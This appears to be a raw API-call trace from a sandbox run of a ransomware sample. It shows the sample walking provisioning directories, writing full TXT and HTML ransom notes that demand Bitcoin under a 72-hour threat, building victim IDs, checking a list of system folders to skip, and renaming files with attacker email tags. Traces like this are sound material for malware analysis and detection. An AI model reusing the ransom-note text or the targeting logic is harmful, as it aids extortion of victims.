	[0174.159] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0174.159] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0174.159] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0174.159] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0174.160] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}"
	[0174.160] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*"
	[0174.160] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0174.160] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0174.160] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\HELP_DECRYPT_YOUR_FILES.TXT") returned 108
	[0174.160] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0174.161] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0174.161] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0174.164] CloseHandle (hObject=0x388) returned 1
	[0174.165] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0174.166] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.166] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0174.167] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0174.167] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0174.167] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0174.168] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0174.168] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0174.168] CloseHandle (hObject=0x388) returned 1
	[0174.168] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0174.169] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0174.169] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0174.169] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\HELP_DECRYPT_YOUR_FILES.HTML") returned 109
	[0174.169] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0174.170] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0174.170] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0174.180] CloseHandle (hObject=0x388) returned 1
	[0174.181] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.182] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0174.182] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0174.182] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0174.183] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0174.184] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0174.184] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0174.184] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0174.184] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0174.184] CloseHandle (hObject=0x388) returned 1
	[0174.185] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x8156bc34, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8156bc34, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0174.185] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*") returned 84
	[0174.185] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.186] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*") returned 0x54
	[0174.186] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.186] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="windows") returned 0x0
	[0174.187] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.187] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="boot") returned 0x0
	[0174.187] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.188] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="system volume information") returned 0x0
	[0174.188] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.188] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0174.188] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.188] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="temp") returned 0x0
	[0174.188] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.188] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="program files") returned 0x0
	[0174.189] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.189] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0174.189] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.189] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="appdata") returned 0x0
	[0174.189] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.189] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="application data") returned 0x0
	[0174.189] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.190] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="winnt") returned 0x0
	[0174.190] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.190] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="tmp") returned 0x0
	[0174.190] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.190] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="cache") returned 0x0
	[0174.190] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.190] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0174.190] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.191] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="webcache") returned 0x0
	[0174.191] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.191] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="inetcache") returned 0x0
	[0174.191] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.191] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="nvidia") returned 0x0
	[0174.191] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.191] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="packages") returned 0x0
	[0174.192] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.192] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="cookies") returned 0x0
	[0174.192] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.192] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="programdata") returned 0x0
	[0174.192] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0174.192] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0174.192] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x8156bc34, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8156bc34, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0174.193] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0174.193] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x814a9a1b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x814a9a1b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x814d0dfe, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xd20, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="CUSTOM~1.SCL")) returned 1
	[0174.193] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8156bc34, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8156bc34, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81592418, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0174.193] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8156bc34, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8156bc34, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8156bc34, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0174.193] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81554848, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x81554848, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x81566dec, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="MASTER~1.SCL")) returned 1
	[0174.193] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0174.193] lstrcmpW (lpString1="Prov", lpString2="..") returned 1
	[0174.193] lstrcmpW (lpString1="Prov", lpString2=".") returned 1
	[0174.193] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}"
	[0174.193] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\"
	[0174.194] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\", lpString2="Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov"
	[0174.194] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov"
	[0174.194] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\"
	[0174.194] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\"
	[0174.194] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\*.*"
	[0174.194] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650066, dwReserved1=0x7d0061, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0174.203] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\*.*") returned 89
	[0174.203] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.203] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*") returned 0x59
	[0174.204] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.204] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0174.204] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.204] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0174.204] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.204] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0174.204] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
